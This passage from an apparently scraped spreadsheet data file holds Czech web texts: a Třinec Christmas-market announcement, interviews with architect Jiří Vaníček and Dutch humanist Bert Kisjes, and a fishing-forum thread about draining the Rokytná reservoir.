žerty“ a v divadelním sále na promítání filmu „Sobík Niko: Cesta za polární záři“. Jarmark bude vrcholit koncertem oblíbené kapely Jelen. Třinecké adventní podvečery s velkými hvězdami Na Vánoční jarmark naváže již 9. ročník Třineckých adventních podvečerů. Od 8. do 22. prosince se náměstí Svobody na 15 dní promění v adventní městečko – místo příjemných setkání, skvělé muziky i voňavých pochoutek. Každý den od 15 do 20 hodin přilákají návštěvníky do centra města lahodné vůně punčů, svařeného vína i domácích specialit. Radost jim udělají krásné vánoční dekorace a drobné dárky. Zvoněním na oblíbenou Zvoničku přání si malí i velcí mohou symbolicky přát štěstí a klidné svátky. Program, který bude probíhat denně od 16 a 18 hodin, nabídne pestrou škálu hudebních vystoupení. Na pódiu se vystřídají jak velká jména naší hudební scény ( Wohnout , Lenny, Yoyo Band, Žlutý pes, Děda Mládek Illegal Band , Hana Holišová &amp;amp; Next Time 7, Queen The Story - Vláďa Hron &amp;amp; band), tak například i mladé talenty ze základních uměleckých škol, místní kapely a sbory. Tradiční zpívání koled v rámci akce „ Česko zpívá koledy“ rozezní 11. prosince celé město a přinese tu pravou vánoční atmosféru. Na rodiny s dětmi čeká opět Večerníček naživo a tvořivá Dětská vánoční cesta. Milovníci vaření si přijdou na své při ukázkách vánoční kuchyně s „Pochutnej si“. Organizaci celé akce zajišťuje Coffee &amp;amp; Cocktail Bar Destiny ve spolupráci se statutárním městem Třinec , Moravskoslezským krajem a místními sponzory. Díky jejich finanční podpoře mohou návštěvníci akce zažít toto kouzelné období zdarma. Těšíme se na vás na rozsvícení třineckého vánočního stromu, na jarmarku i adventních podvečerech. Přijměte pozvání města na akce, které zpříjemní předvánoční čas. Vánoční jarmark 2024 [PDF, 12,1 MB] Třinecké adventní podvečery 2024 [PDF, 10,9 MB]</t>
  </si>
  <si>
    <t>1910</t>
  </si>
  <si>
    <t>707000</t>
  </si>
  <si>
    <t>20241101_355_3242717193_89aa80c68728014d9fe6.html</t>
  </si>
  <si>
    <t>89aa80c68728014d9fe6</t>
  </si>
  <si>
    <t>Chmelový kamarád nejen do deště</t>
  </si>
  <si>
    <t>Chmelový kamarád nejen do deště Redakce 2024-11-01 09:13:00 Zprávy, Rozhovory Spisovatel Aleš Stroukal zpovídá osobnosti našeho regionu: Dělat rozhovor s člověkem, který patří mezi ty nejbližší přátele, je sakra těžký úkol. Nejprve jsme se chtěli s Jirkou VANÍČKEM potkat nahoře na Chmelovém Majáku, ale nakonec já za ním zajel domů do Podbořan . Ahoj Jirko. Čau Aldo, dáš si pivo ? Dám si, ale dobře víš, že jsem na kvalitní pivní moky. Neboj, vím, že jsi Pivomls, tak je v ledničce pár dobrejch piv . Ledacos z chladničky proto muselo dočasně do exilu do sklepa. Než se dostaneme k Tvojí architektuře, začnu úplně od píky. Jsi rodilý Žatečák? No jo, to jsem. Fakt od narození. Narodila se tu v roce 1905 i moje babička.Každý z nás absolvoval základní školu. Na jaké základce jsi zapustil kořeny ty? Chodil jsem na 5. ZDŠ v Komenského aleji. Naproti škole jsme měli družinu a školní jídelnu, kam jsme po vyučování letěli, odhodili tašky do regálu, zblajzli to, co zrovna bylo, abychom mohli být už venku s kamarády. Maturoval jsi na žateckém gymnáziu, to vím a pak jsi studoval na Fakultě architektury v Praze . Proč právě tam? Jó, to byly dobrý roky. Stavby mě přitahovaly už na základce. Původně jsem chtěl studovat stavební průmku v Kadani , zkoušky jsem udělal, ale tenkrát, v roce 1975, se ještě hodně přihlíželo k politickému profilu rodičů a ten nebyl pro tehdejší dobu vyhovující a o školu byl velký zájem. Tak mě nevzali a já se chtěl vyučit zedníkem, tehdy v OSP. Spolužák Franta Kinter to dal a dneska je super zedník. Já ho zradil, protože mě na odvolání přijali na Gymnázium v Žatci , což bylo nakonec to nejlepší, co se mohlo stát. Potkal jsem tam nejlepší pedagogy a kamarády. Z gymplu pak vedla moje cesta přes talentové a technické zkoušky na zmíněnou Fakultu architektury na ČVUT v Praze . Optám se na tvé spolužáky, protože někteří, tak jako ty, dosáhli obecního až státního věhlasu. Jmenuješ nějaké prosím? Aleši , to bude složitý, každý z naší třídy dělá nějakou důležitou práci. Nejtěžší práci má asi Jarda Pantůček, který vede státní firmu Mero a stará se o to, aby měla Česká republika dostatek ropy. A jde mu to dobře! No a po študiích nastávala vždycky práce. Kde bylo tvoje první angažmá? Na studiích mě začaly bavit kulturní a divadelní stavby a scénografie. Jako diplomku jsem si vybral návrh a projekt divadla a po škole mě čekali ve Filmových atelierech v Barrandově, ale člověk míní a život mění. Nastoupil jsem v Krajském projektovém ústavu Ústí nad Labem , kde jsem si pár let odpracoval, než mi v roce 1989 zlákal tehdejší starosta Josef Zábranský do Žatce , protože hledal městského architekta a já se do Žatce chtěl vrátit. Kdy přišla, Jirko, ta myšlenka, že architektonicky ovlivníš podobu města Žatec ? Myšlenka jako taková nepřišla vlastně nikdy a jak se říká, všechno přišlo tak nějak samo, když jsme jako mladí třicetiletí kluci založili s Pavlem Humlem a dalšími spolupracovníky vlastní projekční atelier a první naše stavby vznikaly převážně právě v Žatci . Ne každý v Žatci je tvými návrhy nadšen, znám i osoby, kterým se přímo nelíbí. Jak snášíš kritiku? Já docela blbě. Tak to prostě je. Když je kritika oprávněná, tak se opravdu zamyslím. Třeba může mít dotyčný pravdu, protože je zkušenější a víc toho v životě dokázal. Architektura je věcí veřejnou a je vystavena veřejné debatě. Stavby, které nikoho nenaštvou nebo nenadchnou, jako by nebyly, protože to znamená, že si jich nikdo ani nevšiml. Jednou v zimě se u nás na chatě rozfajrovaly kamna, šli jsme proto spát na půdu a tys mi tam vyprávěl sen, že jednou se v Žatci postaví maják a že schody budou tvořit takové železné rohožky, či jak to nazvat a my budeme stoupajícím ženám koukat pod sukně…pamatuješ? Aby si tenkrát pochopil, co je to průhledná podlaha, dodnes to nevíš (smích). Měli bychom si jít jednou k Majáku stoupnout a dobře se koukat, dokud ještě vidíme (ještě větší smích). Ještě než se dostaneme ke všem těm tvým žateckým projektům, zabrousil bych chvilku do tvé rodiny. Jsi ženatý, máš dva vynikající kluky – Honzu a Jirku, a i bezva snachy – Áňu a Evu. A už jsi i dědkem. Tak se pochlub. Aleši , jako tripldědek mám dva skvělý syny a oni skvělý rodiny. Tak si přeju, aby jim to vydrželo navěky. A co tví rodiče? Podporovali tě v tom architektování? Bez nich by to nešlo. Studium stojí spousty peněz, které si tehdy museli odřeknout. Jim patří dík. I mojí sestře Ivě, která se mnou sdílela pokojík a musela tak vydržet moje noční rýsování. Byli jsme spolu s rodinami na spoustě dovolených. Která byla pro Tebe top? (Aspoň dáš tip čtenářům na dovolenou.) Mně se líbily naše opakované prázdninové pobyty v osadě v Křišťanovicích u Prachatic na Šumavě , kde byl rybník, les, stánek s pivem a prostor pro řádění dětí i nás, větších a přerostlých dětí. V Křišťanovicích i jinde jsme spolu natáčeli, tehdy ještě na videokameru, různé ozvučené klipy a úžasně jsme si to užívali. Pouštíš si je? Pouštím. Byla to nekonečná sranda, která se jen tak už nevrátí. Ten pocit zná asi každý. Jirko, ty jsi i houbař, že jo. Pochlub se. Vždyť ty to víš, Aldo, naučil jsem tě sbírat krásnoporku mlynářku. A pamatuješ na tu smaženici z hřibů hořčáků na Šumavě ? No, jé je. To byla úžasná hořká mňamka po ránu. Dovol ještě zásah do soukromí. Jsi vzdáleným příbuzným pana Jiřího Suchého , máš jeho písně rád? Písničky od Jiřího Suchého jsou už klasikou, co? Setkal jsem se s ním, ale často se setkáváme s jeho synem Jakubem a Kubovou ženou Tamarou. A jaké kapely či zpěváci jsou tvým šálkem čaje? Ty mi dáváš, víš, že nejsem Hudbožrout jako Ty. Mě se líbí různé písničky a od různých kapel, které často ani nevím, jak se jmenují. Jsem stará škola, pro mladý už takový dechovkář, líbil se mi Jiří Schelinger , chtěl bych ještě naživo zažít koncert Ozzyho Osbourna, což už se mi asi nepovede. Poslouchám Uriah Heep, Franka Zappu a tak… Konečně k projektům. Máš svého favorita mezi Tvými návrhy? Pokladnu na koupališti v Podbořanech . Telecom , Synagoga, Mládí, Radnice… A co Sladovna? To byla ruina. Co je Sladovna dnes? Dnes je to obnovený, opravený a fungující dům, který by měly následovat další ruiny v Žatci . Chrám chmele a piva . Kapitola sama pro sebe. Prozraď něco ze zákulisí. To je povídání na celou knížku. Nebýt party lidí seskupených do stejnojmenného občanského sdružení a pochopení tehdejšího vedení radnice, tak ten projekt nikdy nevznikl. Podařilo se revitalizovat celou zapomenutou rozblácenou městskou čtvrť, která je dnes docela oblíbeným místem. V rámci stavby se opravilo celé náměstí Prokopa Malého , obnovila se Kapucínská zahrada. Povedlo se postavit repliku Renesanční sladovny, Chmelový maják, Informační centrum ve skladu chmele, pivovar s restaurací a dětské hřiště. Nově byla zastavěna i proluka před Chmelařským muzeem. Chmelový maják. Pro mě skvost, pro někoho chvost. Eiffelovku ale také místní nechtěli. To je pravda. Kašnu na náměstí někteří lidé kritizují a má nelichotivou přezdívku. S kašnou na náměstí nemám nic společného. Nelíbí se mi tam. Autobusové nádraží se vám povedlo, nemýlím-li se? Snad ano. Projekt byl vypracován ve spolupráci s žateckým Designprojektem. Předchozí stav nádraží byl ostudou pro město. Na Nerudově náměstí jsi chtěl sochu koně, který místo na podkovách stojí na půllitrech. Já byl pro, ale návrh neprošel. Proč? Měl to být symbol chmelařství a pivovarnictví podaný recesním způsobem od sochaře profesora Michala Gabriela . Bomba! Chceš vidět fotku? Návrh se hodně líbil, ale našel si i své odpůrce. Pro investora je těžké najít odvahu a rozhodnout o návrhu, který může být později někým kritizován. Chápu. Jinde to ale jde. Ještě, že o stavbách Chrámu Chmele a Piva rozhodovali jiní…, jinak by teď nestály. Mederův dům . Bydlím kousíček od něj a kolikrát občas z okna slyším nadšení lidí, kteří jej navštívili. Díky, Aleši . O obnovu domu se plně zasloužil spolek Mederova domu , jmenovitě Petr Antoni. Co je tvým dalším plánem v Žatci ? Nevím, člověče. Plány už teď vytváří jiní. Žatec je součástí UNESCO. Máš z toho radost? Je to vyznamenání být po boku památek, jako je Paříž , Barcelona , Benátky či Velká čínská zeď nebo třeba pyramidy v Egyptě . Obyvatelům města, regionu i celé České republice může členství v tomto klubu přinést hrdost, prestiž, věhlas a spoustu odpovědnosti a práce! V Žatci , podobně jako i v jiných městech je v centru problém parkování. Měl bys řešení? Problém desetiletí, který se nikomu nechce řešit, a tak se odsunuje úspěšně skoro 20 let na příští generaci. Ti nám ale poděkují, propásli jsme už spousty příležitostí. Řešení vidím jediné. Vybudovat odstavnou kapacitu minimálně pro 500 aut. Menší nemá smysl, to by byly vyhozené peníze. To je ale na samostatný článek. Nevím, jestli to téma Tvoje čtenáře detailně zajímá. Ostatně si nejsem jistý, jestli zajímá odpovědné lidi a mnohé členy různých místních komisí.Jirko, moc díky za odpovědi na moje otázky. O Chmelobraně až příště. Tak jo. Taky díky. Napsal(a): Aleš Stroukal Autor: Grape SC, a.s. || Napsal(a): | Redakce || Redakce Rubrika transition_slide Zprávy</t>
  </si>
  <si>
    <t>566</t>
  </si>
  <si>
    <t>480</t>
  </si>
  <si>
    <t>20241101_356_3242724314_864f772983b16604f98e.html</t>
  </si>
  <si>
    <t>864f772983b16604f98e</t>
  </si>
  <si>
    <t>S Bertem Kisjesem, který tvoří z míst kostely a z kostelů místa (rozhovor)</t>
  </si>
  <si>
    <t>S Bertem Kisjesem, který tvoří z míst kostely a z kostelů místa (rozhovor) Když jsem na konci osmdesátých let poprvé navštívila hotel Sonnevanck, měla jsem pocit, že jsem tak trochu v kostele, i když ten dům s terasou na úpatí dun, s proskleným sálem, kuchyní a pokoji pro hosty ve dvou poschodích vnějškově kostel ani trochu nepřipomínal. Svou atmosférou ale budil dojem, že to je místo úplně pro všechny. Mohli jste tam potkat dámy v letech, podnikatele, děti, psy, umělce, dělníky z nedalekých oceláren Hoogovens, důchodce, učitele, mladíky, kteří vypadali, že jsou proti všemu, a staříky, kteří vypadali, že jsou pro všechno. A tyhle lidi z různých společenských vrstev a také s různými světonázory a pohledy na život spojoval tehdejší majitel Sonnevancku Bert Kisjes. O čtyřicet let později jsem navštívila kostel Grote Kerk v Beverwijku, který nese všechny znaky gotického chrámu a tehdy se opět stal svobodným místem pro všechny. V Holandsku se kostely zavírají ve velkém, dobrá pětina z nich je přeměněna na úřady, byty, tělocvičny. A tak když se Bert Kisjes doslechl, že takový osud čeká i Grote Kerk, projevil o něj zájem. A druhý den měl od něj klíče. A to není jen tak, svěřit někomu chrám. Takový člověk se musí těšit hodně dobré pověsti a respektu. Stejně jako v Sonnevancku, tak i v beverwijském kostele je patrné silné pouto k Československu , respektive k Čechům. Váže se k šedesátým letům, kdy Bert Kisjes studoval v Praze rok teologii, naučil se česky a navázal řadu celoživotních přátelství. V Sonnevancku se střídaly české kapely, dostávali prostor čeští výtvarníci, filmaři, spisovatelé a fotografové. Pro mnohé z nich to byla po roce 1989 první příležitost představit svoji tvorbu ve svobodném světě. A ten v Sonnevancku díky svobodomyslnému duchu Berta Kisjese byl a je. To pouto přetrvává dodnes. Letos ve Velkém kostele v Beverwijku Bert Kisjes, filozof a humanista, uspořádal výstavu zaměřující se na myšlení v období první republiky v Československu , T. G. Masaryka , Jana Patočku , ale také Edmunda Husserla . Bert Kisjes Narodil ses za války. Poznamenala tvoje dětství? Narodil jsem se v roce 1940, můj otec byl ředitelem základní školy, žili jsme ve vesnici De Heurne na nizozemsko-německé hranici. Za války byl s místními Němci přece jen trochu problém. Muselo se před nimi tajit, že se u sedláků schovávají lidé. Všichni to kromě Němců věděli, ale nikdo nic neřekl. Když končila válka, to mi bylo pět let, museli jsme utéct z domova. Vedle domu, kde jsme bydleli, stál totiž kostel a v něm byla tajná tiskárna. Když na nedaleký Emmerich padaly bomby, uchýlila se do naší vesnice jedna Němka. Nevěděli, co s ní, a tak ji zamkli v pokoji. Když šli kolem Němci, začala na ně z okna volat: Hilfe, hilfe! V tu chvíli nás matka popadla a odvedla na statek. Tam jsme byli v bezpečí. Kdy ses rozhodl, že budeš studovat teologii? Ve čtrnácti letech jsem se chtěl stát pastorem. To byl důvod, proč jsem šel na gymnázium. Tam jsem přišel do styku s vyššími společenskými vrstvami. Ve své vesnici jsem vyrůstal hlavně mezi zemědělci a řemeslníky. Moji prarodiče byli také zemědělci. Na této škole jsem přišel do styku s muzicírováním. A potom jsi studoval co? V roce 1960 jsem začal na univerzitě v Utrechtu studovat teologii. To rozšířilo můj obzor. Když naše generace, která zažila válku, v šedesátých letech zaplnila univerzity, začala hledat jiné politické ideje. A tak jsme začali číst Marxe. Můj první článek se týkal problému jaderné bomby. Takže jsi byl marxista? Nebyl, jen jsem ho studoval, přečetl jsem Manifest. Je přirozené, že věříš rodičům. Atmosféra v naší rodině byla křesťanská. V té době se hodně diskutovalo o hospodářském systému, o socialismu. Myslím, že rozdělení světa na dva různé ekonomické systémy, kapitalismus a komunismus, není pro lidskou mysl zajímavé. Věříme v inženýry, že dokáží stvořit blahodárnou kapitalistickou společnost. Ovšem komunističtí inženýři, jak jsem je poznal u vás, nebyli o nic lepší. Kdy jsi přijel poprvé do Československa ? V roce 1964 jsem dostal možnost studovat jeden rok v Praze na Komenského fakultě . Bydlel jsem ve studentské koleji V Jirchářích 31 a byl jsem samozřejmě v kontaktu s ostatními studenty. Od září 1964 do června 1965. Pro mě to byl nádherný rok, kdy jsem se seznámil s mnoha lidmi, kteří se stali mými přáteli. Především to byl Jan Miřejovský , jeho otec byl evangelický farář působící v kostele u Klimenta, Sváťa Karásek , Otakar Funda , dnes profesor teologie, Pavel Rejchrt , Vráťa Brabenec , Jaromír Máša, moc důležitý byl pro mě Ivan Urbánek, Mirek Rada, Jan Šplíchal, Marie Zemanová , později Zuzana Dražilová … Potom se přidali další. Našel jsem blízká přátelství. Bert Kisjes, koláž Jana Šplíchala Po studiích jsi dělal pastora? Když jsem v Utrechtu v roce 1967 zakončil studium diplomovou prací o Albertu Camusovi , byl jsem požádán, abych se stal členem týmu Internationale Hulpverlening, což byla organizace nizozemské reformované církve. V jejím čele stála inspirativní Hebe Kohlbrugge. Hodně jsem se od ní naučil. Co třeba? To ona vymyslela program, který posílal studenty do zahraničních komunit. Pro církev je důležité, že se lidé znají, že si i jazykově rozumějí. Vyslala osmdesát studentů na teologické fakulty do tehdejších komunistických zemí, do Polska , Maďarska , na Ukrajinu , do Srbska … A do Československa . Politický koncept železné opony byl pro ni nepřijatelný. Dočetla jsem se o ní, že do tehdejších komunistických zemí pašovala teologickou literaturu. Taky jsi pašoval? Taky. Dobrou literaturu, která v Československu chyběla. Když se ale Hebe Kohlbrugge dostala do konfliktu se synodem církve, práce v Internationale Hulpverlening skončila. Když si totiž Hebe Kohlbrugge myslela, že je něco správné, tak to dělala bez ohledu na názor nebo odpor hlavy reformované církve. Byla v koncentráku, před válkou si myslela, že je to v Berlíně zajímavé, jako mladá holka se setkala s Bekennende Kirche, která byla proti Hitlerovi, vznikla jako opozice vůči snahám o sjednocení všech protestantských církví do jedné pronacistické Německé evangelické církve. Drommedaris Co jsi dělal potom? V roce 1974 jsem se stal ředitelem De Drommedaris, pěkné věže ve starém přístavním městě Enkhuizen. Stala se místem pití a jídla, hudby a umění. Místem v tradici „kavárny“ – řeckého „kapheneionu“. Byly zde také postele. Když jsem u tebe a tvé ženy Eriky v roce 1982 několik měsíců bydlela se svou půlroční dcerou, hodně jsem se od vás naučila, co je v životě důležité, a co zas až tak ne. Od tehdejší většinové holandské společnosti jste se dost lišili. Aniž byste to proklamovali, žili jste zcela přirozeně nekonzumním a ekologickým způsobem života: jedny boty, jeden kabát, jídla tak akorát, zařízení domu na celý život. Člověk toho až tak moc nepotřebuje. Pamatuju si také, že jsi míval každý týden schůzku se starými lidmi. Ano, v De Drommedaris jsem poznal, jak jsou starší lidé pro společnost důležití, a začal jsem přemýšlet o jejich místě ve veřejném životě. Co konkrétně jste dělali? Povídali jsme si. V té době jsi začal spolupracovat se svým švagrem Basem de Roeverem. Ano, požádal jsem ho, aby mi přišel pomoci. Byl vynikající kuchař. Líbil se mu můj neortodoxní způsob vedení podniku. Společně jsme se stali silným týmem schopným ignorovat to, co radili profesionálové. Výsledkem bylo příjemné místo namísto luxusních nápojů, jídla a nábytku. Neinspirovaly tě taky trochu české hospody, kde si každý mohl dovolit dát pivo a kde se potkávali lidé nejrůznějších profesí? Ano, mám moc rád české hospody, takové nejsou v Holandsku běžné. Bert Kisjes s rodinou při odchodu z Drommedarisu Po deseti letech ses rozhodl z De Drommedaris odejít. Proč? Neměl jsem čas na svou ženu a dvě děti. Těch deset let bylo příliš intenzivních. Rozhodli jsme se, že si koupíme obytný vůz a pojedeme navštívit Evropu . To trvalo jeden rok. Zima ale byla ten rok dost krutá, a tak jsme se přeplavili do Maroka , kde bylo tepleji. Co jsi dělal, když jste se vrátili do Holandska ? V roce 1985 jsem koupil prázdný hotel s kavárnou a restaurací u moře, ve vesnici Wijk aan Zee. Léta strávená v Drommedaris byla velmi užitečná. Věděl jsem, jak podnik zařídit, a věřil jsem, že takový koncept je ve Wijk aan Zee také možný. Podruhé jsem vytvořil místo, kde lidé rádi pobývají a navazují kontakty. Jediným luxusem byl starý klavír (Blüthner 1920). Měl to být magnet pro klavíristy, a taky že byl. Mimo jiné jsem ve Wijk aan Zee poznal, jak inspirativní mohou být pro obec cizinci. Hotel Sonnevanck v Wijk aan Zee Já si pamatuji kuchaře Sura . Ano, to byl emigrant ze Šrí Lanky , původním povoláním úředník. Slíbil jsem mu, že když se u Base zaučí, bude moci v Sonnevancku pracovat jako kuchař. Zůstal u nás až do penze. Nebo Pierre, ten se u nás ubytoval, když odešel z francouzské cizinecké legie. Ze Švýcarska si dal poslat obrovský kámen a za hotelem ho začal tesat. Pracoval na něm rok. A každý večer ukazoval hostům pokrok, jaký na něm ten den udělal. Moc jsme nechápali, co z toho kamene bude. A dozvěděli jste se to? Ano, byl to náhrobní kámen pro jeho sestru. Ve Wijk aan Zee se pořád něco dělo. Od návštěvy vašich anglických sousedů na druhé straně moře, kam jste s obyvateli Wijk aan Zee přeplavali lodí, přes šachové turnaje po všemožné koncerty a výstavy. Myslím, že jsme z té vesnice vytvořili tvůrčí pospolité centrum. V roce 1985 byla téměř prázdná, a když jsme v roce 2000 odcházeli, praskala ve švech. Vesnice Wijk aan Zee se stala slavnou. Pardubická skupina Trdlo hraje v Sonnevancku Dokonce se stala kulturní vesnicí Evropy . Ano, v roce 1994 jsem se rozhodl vyhlásit Wijk aan Zee kulturní vesnicí Evropy roku 1999. Prostě sis to usmyslel a udělal? Cítil jsem, že by se mělo něco udělat pro podporu malých obcí. Umožnit méně formální způsob života, který se moderní společnost snaží eliminovat. Stal se z toho celoevropský projekt. Cultural Village of Europe. Já v něm působil od roku 1999 do roku 2014. Kolik vesnic se zapojilo? Dvanáct. Taky jedna česká vesnice – v roce 1997 jsem se dostal do kontaktu s městečkem Bystré u Poličky a od té doby probíhala a probíhá intenzivní a příjemná spolupráce. Když teď navštívím Českou republiku , chci navštívit Prahu a Bystré. … kde ses stal v roce 2014 čestným občanem. Od roku 2000 jsem pak pracoval už jen pro Cultural Village of Europe. Zastával jsem funkci ambasadora venkova. V chartě nadace Cultural Village of Europe píšeš: „Věříme, že venkov může mít obrovský vliv na úspěšnou budoucnost Evropy a že k tomu má dostat co největší příležitost. Vesnice je dávný lidský rozměr světa. Je to svět známý, plný blízkých lidí i věcí. Přes všechen pokrok, přes všechny změny bude vždy rozdíl mezi tím, co známe, a tím, co je nám blízké. Když se nám to, co nám bylo blízké, odcizí, ztrácíme kořeny.“ Vycházel jsem z toho, že kultura na venkově lidi spojuje, že se dělá společně, snažil jsem se objevovat kvality a specifika malých komunit. Do Československa , posléze do České republiky , jsi jezdil skoro každý rok. Alespoň jednou ročně. V roce 1968 jsem tam byl čtyři měsíce: od května do září. Tenkrát jsem přijel do Československa autem a s Janem Miřejovským jsme odjeli na Slovensko . A už v červnu nebo v červenci jsme tam viděli sovětské vojáky. To není dobrý, pomysleli jsme si. A taky že nebylo. Věra Urbánková a Bert Kisjes, oslava narozenin, Praha 1965 Věřil jsi v tzv. komunismus s lidskou tváří? Tohle sousloví jsem nepoužíval. Někdo byl v té době optimista, někdo tomu zase nevěřil, mnoho komunistů, kteří v padesátých letech komunismus budovali, bylo zklamaných a snažilo se o reformu. V šedesátých letech jsem si uvědomil, že by moje návštěvy Československa měly být víc než jen turistické cesty. Začal jsem v Holandsku pořádat výstavy, první Ivanu Urbánkovi, potom Miroslavu Radovi , Janu Šplíchalovi, Aleši Veselému . Do Prahy jsi přijel taky sotva pár dní po 17. listopadu 1989. Ano, chodil jsem na demonstrace, sledoval u vás doma televizi. A za čas do mého holandského hotelu dorazila invaze tří autobusů: ze Slovenska , Brna a Prahy . Ivan Vyskočil byl jedním z návštěvníků. A v roce 2005 do Čech zase dorazil autobus plný Holanďanů. Nejen těch. To už souviselo s Cultural Village of Europe, projeli jsme padesát vesnic ve dvaceti pěti evropských zemích… Za tři měsíce jsme najeli třináct tisíc kilometrů. Chtěli jsme poznat, čím se jednotlivé vesnice v různých zemích liší a co je spojuje. V roce 2017 jsi získal ocenění Artis Bohemiae Amicis, která se uděluje osobnostem, které přispěly k šíření dobrého jména české kultury v zahraničí. O rok později, v roce 2018, když jsme slavili sté výročí vzniku Československa , jsi vyslal do Prahy autobus plný holandských hudebníků. Hráli a zpívali po celém městě. Ano. Slavili jsme s vámi. Mensenhuis A když ti bylo čtyřiasedmdesát, funkci ambasadora Cultural Village of Europe jsi opustil. Co jsi dělal potom? Doslechl jsem se, že lidé z evangelické církve chtějí v Beverwijku zavřít velký evangelický kostel – Grote Kerk. Požádal jsem o povolení ten kostel využívat jako místo pro celou komunitu v Beverwijku. A to povolení jsem dostal. Náš kostel nazýváme „Mensenhuis“ – Lidový dům. Nebo dům pro lidi. Prostě svobodné místo. Co máš dál v plánu? V „Mensenhuis“ jsem vytvořil místo pro všechny. Až ho už nepovedu, budu si ho moci sám užívat. Jen si tak povídat s lidmi o životě a ptát se jich, jaké jsou podle nich nejdůležitější životní hodnoty jakožto stavební kameny pro budoucnost. Budu se jich ptát, co je pro ně v životě to nejdražší. Autor: editor</t>
  </si>
  <si>
    <t>344</t>
  </si>
  <si>
    <t>126</t>
  </si>
  <si>
    <t>20241101_357_3243092535_70071cdd112975610e56.html</t>
  </si>
  <si>
    <t>70071cdd112975610e56</t>
  </si>
  <si>
    <t>Rokytná 3A</t>
  </si>
  <si>
    <t>Rokytná 3A Pepe.d - Profil | So 9.11.2024 0:07:34 Ned &amp;gt;&amp;gt; čekal jsem aspoň nějaký pařez nebo cokoli. Ale ne že je to takhle čistý lavor.., Pepe.d - Profil | So 9.11.2024 0:06:13 dada11 &amp;gt;&amp;gt; jj přesne tak. Až se divím, že se tam rybam až tak dařilo. Viděl jsi i co tam bylo za ryby? Byli tam i candati nebo to všechno v létě leklo? Diky Ned - Profil | Pá 8.11.2024 22:22:23 vladěna &amp;gt;&amp;gt; jako pivo ?:-)) vladěna - Profil | Pá 8.11.2024 21:00:47 Ned &amp;gt;&amp;gt; bahno? Ned - Profil | Pá 8.11.2024 9:43:37 dada11 &amp;gt;&amp;gt; co byste si na tom dně asi tak představovali:-) dada11 - Profil | Pá 8.11.2024 6:17:25 stormandnature &amp;gt;&amp;gt; Díky dada11 - Profil | Pá 8.11.2024 6:16:55 Pepe.d &amp;gt;&amp;gt; Čistý lavor. stormandnature - Profil | Čt 7.11.2024 23:03:09 dada11 &amp;gt;&amp;gt; víc jsem nestihl. Ono taky nebylo moc co fotit. Pepe.d - Profil | Čt 7.11.2024 20:41:35 dada11 &amp;gt;&amp;gt; já tam nebyl, bohužel jsem nestihl. Mám z tama jednu fotku, než to bylo úplně prázdné. Překvapilo me, že tam není snad jediná vazka... Úplně rovně dno dada11 - Profil | Po 4.11.2024 6:40:39 Nemá někdo fotky z výlovu? stormandnature - Profil | Ne 3.11.2024 21:09:32 Odebrali jsme tam slovenou bílou rybu. Nechci kecat, ale co jsem slyšel, slovilo se asi 60 metráků. Měla by se dělat sondáž a oprava hráze, včetně výpusti, možná se bude výpustné zařízení přemisťovat na střed hráze. Carplounge - Profil | Ne 3.11.2024 17:51:17 Co legenda big john? Kde skončil? Byla to voda s trofejnima kaprama novel - Profil | Ne 3.11.2024 17:33:53 Nechápu, co má oprava hráze společného s EDU2? To jako přes Rouchovany budou jezdit těžké kamiony s materiálem? Vždyť se tam nikde nesmotají 😁 Pepe.d - Profil | Ne 3.11.2024 16:44:59 TYDOGO &amp;gt;&amp;gt; přesně tak musí opravit/zpevnit hráz kvůli dostavbě jaderky... novel - Profil | Ne 3.11.2024 14:31:52 Neví někdo kolik se čeho slovilo? Stačí jen přibližně, jen pro info. Díky dada11 - Profil | So 2.11.2024 14:44:32 Carplounge &amp;gt;&amp;gt; Tam jsem lovil dnes 🤣🤣 Carplounge - Profil | So 2.11.2024 11:19:07 dada11 &amp;gt;&amp;gt; neříkej…příští víkend je výlov na dalasu👍 TYDOGO - Profil | So 2.11.2024 11:09:17 Slyšel jsem, že je potřeba oprava a zpevnění hráze. Taky je tam nějaký problém s kolaudací. Vše bude asi spojeno s dostavbou jaderky. dada11 - Profil | So 2.11.2024 9:52:26 Carplounge &amp;gt;&amp;gt; Dneska je výlov. Ned - Profil | Pá 1.11.2024 23:43:14 novel &amp;gt;&amp;gt; 🤦🏻 novel - Profil | Pá 1.11.2024 19:29:56 Tati &amp;gt;&amp;gt; Kapři jsou tam otrávení tím kobercem z bojslizu, co tam dělají ti modeláři s loďkama. 🤮 novel - Profil | Pá 1.11.2024 19:20:48 Dle neověřené informace, to bude soukromák 🙁 Tati - Profil | Pá 1.11.2024 17:41:04 Dneska jsem tam byl a moc jich tam není,taky se není čemu divit,když se tam ještě nedávno chytalo. Ned - Profil | Pá 1.11.2024 17:25:17 Carplounge &amp;gt;&amp;gt; Budou přepočítávat kapry 70+ jestli jsou všichni ;-) Carplounge - Profil | Pá 1.11.2024 14:37:05 Ahoj chlapi, prosím neví někdo co děje na gabču? Proč je to vypuštěny?? Ned - Profil | Pá 1.11.2024 9:46:22 26.10.2024 alfonz42 - Profil | Po 20.5.2019 22:19:12 ivik096 &amp;gt;&amp;gt; zákazem vjezdu z Višňové 😉 Ale to už asi dávno víš 😃 alfonz42 - Profil | Po 20.5.2019 22:17:37 Škrtněte si další podrevír, lepší to už nebude... ivik096 - Profil | Po 26.9.2016 11:17:02 Nemohl by mi někdo poradit jak se dostanu na dunajovickou nádrž z jiné strany než od toho kempu? Přes hráz nelze projet autem, ale auta na druhé straně vídám, kudma tam teda jezdí? Díky za odpověd:) alfonz42 - Profil | Čt 10.3.2016 17:33:50 spydy &amp;gt;&amp;gt; Já na schůze nechodím, ale chodím k vodě:-) pepulda - Profil | Čt 10.3.2016 17:30:54 spydy &amp;gt;&amp;gt; Zatím pořád zůstávají pod MRS... spydy - Profil | Čt 10.3.2016 17:03:20 alfonz42 &amp;gt;&amp;gt; diky, ja si nebyl vubec jisty, schuzy jsem bohuzel propracoval. alfonz42 - Profil | Čt 10.3.2016 16:52:31 spydy &amp;gt;&amp;gt; rybník Jazírka Višňové 1.2 ha - MRS tonybal - Profil | Čt 10.3.2016 16:46:04 Tak tam jsem ještě nikdy nebyl.:) spydy - Profil | Čt 10.3.2016 16:35:49 Rybářský revír tvoří nádrže: Valovo I a II Horní Kounice 1 ha - provadi rybolov Obec Kordula Řešice 1.5 ha - nebyl jsem x let snad bez zmeny Kacíř Tavíkovice 4.9 ha - bez zmeny požární nádrže Medlice 0.1 ha - rybolov Obec rybník Jazírka Višňové 1.2 ha - nejsem si jisty, ale asi rybolov Obec (byla pouze Obec, potom MRS, potom Obec a ted nevim) Rouchovanská Rouchovany 9.3 ha - bez zmeny - ale pozor je 